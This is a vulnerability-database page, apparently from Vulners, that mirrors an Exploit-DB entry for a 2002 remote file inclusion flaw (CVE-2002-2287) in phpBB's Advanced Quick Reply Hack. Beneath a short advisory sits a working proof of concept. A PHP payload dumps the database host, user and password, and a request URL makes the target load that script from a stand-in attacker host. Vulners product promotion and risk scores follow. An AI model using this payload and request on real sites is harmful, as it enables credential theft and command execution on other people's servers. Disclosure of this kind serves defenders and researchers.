Lucene search
+L

phpBB Advanced Quick Reply Hack 1.0/1.1 - Remote File Inclusion

🗓️ 13 Nov 2002 00:00:00Reported by Hai Nam LukeType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 50 Views

phpBB Advanced Quick Reply Hack allows remote file inclusion, risking server command execution.

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2002-2287
18 Oct 200710:00
cve
Cvelist
CVE-2002-2287
18 Oct 200710:00
cvelist
EUVD
EUVD-2002-2265
7 Oct 202500:30
euvd
NVD
CVE-2002-2287
31 Dec 200205:00
nvd
source: https://www.securityfocus.com/bid/6173/info

The phpBB Advanced Quick Reply Hack is prone to an issue which may allow attackers to include arbitrary files from a remote server.

It is possible for remote attackers to influence the include path for 'extension.inc' in the 'quick_reply.php' script. As a result, an attacker may cause an arbitrary PHP script to be included from an attacker-supplied source, which may result in execution of commands with the privileges of the webserver.

<?php
include('config'.'.php');
echo "DB Type: $dbms <br>";
echo "DB Host: $dbhost <br>";
echo "DB Name: $dbname <br>";
echo "DB User: $dbuser <br>";
echo "DB Pass: $dbpasswd <br>";
exit;
?>

Then submit the following request to the host running the vulnerable software:

http://www.example.com/quick_reply.php?phpbb_root_path=http://attackersite.tld/&mode=smilies

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Oct 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.02255
50